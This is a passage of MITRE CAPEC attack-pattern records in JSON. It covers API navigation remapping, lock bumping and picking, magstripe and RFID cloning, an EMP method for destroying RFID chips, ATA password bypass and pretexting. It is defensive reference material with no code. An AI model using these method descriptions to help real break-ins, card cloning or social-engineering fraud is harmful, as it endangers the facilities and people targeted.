proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"386":{"ID":"386","Name":"Application API Navigation Remapping","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user\'s photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"387":{"ID":"387","Name":"Navigation Remapping To Propagate Malicious Content","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers\' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers\' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"386"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Resources_Required"}]}},"388":{"ID":"388","Name":"Application API Button Hijacking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"386"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy."},"Example_Instances":{"Example":{"p":["An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:","By altering the destination of \\"Claim_Link\\" to point to the attackers\' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \\"Yes\\" or \\"No\\" causes the user to load the attackers\' code."],"div":["[Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"389":{"ID":"389","Name":"Content Spoofing Via Application API Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers\' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers\' intent. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"384"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"353"}},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Resources_Required"}]}},"390":{"ID":"390","Name":"Bypassing Physical Security","Abstraction":"Meta","Status":"Draft","Description":"Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.","References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"391":{"ID":"391","Name":"Bypassing Physical Locks","Abstraction":"Standard","Status":"Draft","Description":"An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"390"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"392":{"ID":"392","Name":"Lock Bumping","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"391"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"393":{"ID":"393","Name":"Lock Picking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"391"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"394":{"ID":"394","Name":"Using a Snap Gun Lock to Force a Lock","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"391"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}}},"395":{"ID":"395","Name":"Bypassing Electronic Locks and Access Controls","Abstraction":"Standard","Status":"Draft","Description":"An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"390"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"397":{"ID":"397","Name":"Cloning Magnetic Strip Cards","Abstraction":"Detailed","Status":"Draft","Description":"An attacker duplicates the data on a Magnetic strip card (i.e. \'swipe card\' or \'magstripe\') to gain unauthorized access to a physical location or a person\'s private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker\'s desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"398":{"ID":"398","Name":"Magnetic Strip Card Brute Force Attacks","Abstraction":"Detailed","Status":"Draft","Description":"An attacker analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals. Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks. For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"Prerequisites":{"Prerequisite":"The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created."},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"399":{"ID":"399","Name":"Cloning RFID Cards or Chips","Abstraction":"Detailed","Status":"Draft","Description":"An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse. RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user\'s identification.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"400":{"ID":"400","Name":"RFID Chip Deactivation or Destruction","Abstraction":"Detailed","Status":"Draft","Description":"An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it. When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"}}},"401":{"ID":"401","Name":"Physically Hacking Hardware","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system\'s integrity for the purpose of carrying out an attack.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"440"}},"Example_Instances":{"Example":"A malicious subcontractor or subcontractor\'s employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1263"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Attack_Patterns, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Related_Weaknesses"}],"Previous_Entry_Name":["Hacking Hardware Devices or Components",{"Date":"2015-11-09"},"Hacking Hardware",{"Date":"2020-07-30"}]}},"402":{"ID":"402","Name":"Bypassing ATA Password Security","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"401"}},"Prerequisites":{"Prerequisite":"Access to the system containing the ATA Drive so that the drive can be physically removed from the system."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 9: Hacking Hardware"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"406":{"ID":"406","Name":"Dumpster Diving","Abstraction":"Detailed","Status":"Stable","Description":"An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more. By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"163"}]},"Prerequisites":{"Prerequisite":"An adversary must have physical access to the dumpster or downstream processing facility."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it."}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Social Information Gathering via Dumpster Diving",{"Date":"2017-08-04"}]}},"407":{"ID":"407","Name":"Pretexting","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary\'s interests. During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary\u2019s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"416"},{"Nature":"ChildOf","CAPEC_ID":"410"},{"Nature":"CanPrecede","CAPEC_ID":"163"}]},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Depending on the adversary\'s intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks."},"Example_Instances":{"Example":"The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Social Information Gathering via Pretexting",{"Date":"2017-08-04"}]}},"410":{"ID":"410","Name":"Information Elicitation","Abstraction":"Meta","Status":"Draft","Description":"An adversary engages an individual using any combination of social engineering methods for the purpose of extracting information. Accurate contextual and environmental queues, such as knowing important information about the target company or individual can greatly increase the success of the attack and the quality of information gathered. Authentic mimicry combined with detailed knowledge increases the success of elicitation attacks.","Typical_Severity":"Low","References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Information Elicitation via Social Engineering",{"Date":"2017-08-04"}]}},"412":{"ID":"412","Name":"Pretexting via Customer Service","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming the role of someone who works for Customer Service, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. One example of a scenario such as this would be to call an individual, articulate your false affiliation with a credit card company, and then attempt to get the individual to verify their credit card number.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"413":{"ID":"413","Name":"Pretexting via Tech Support","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming the role of a tech support worker, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. An adversary who uses social engineering to impersonate a tech support worker can have devastating effects on a network. This is an effective attack vector, because it can give an adversary physical access to network computers. It only takes a matter of seconds for someone to compromise a computer with physical access. One of the best technological tools at the disposal of a social engineer, posing as a technical support person, is a USB thumb drive. These are small, easy to conceal, and can be loaded with different payloads depending on what task needs to be done. However, this form of attack does not require physical access as it can also be effectively carried out via phone or 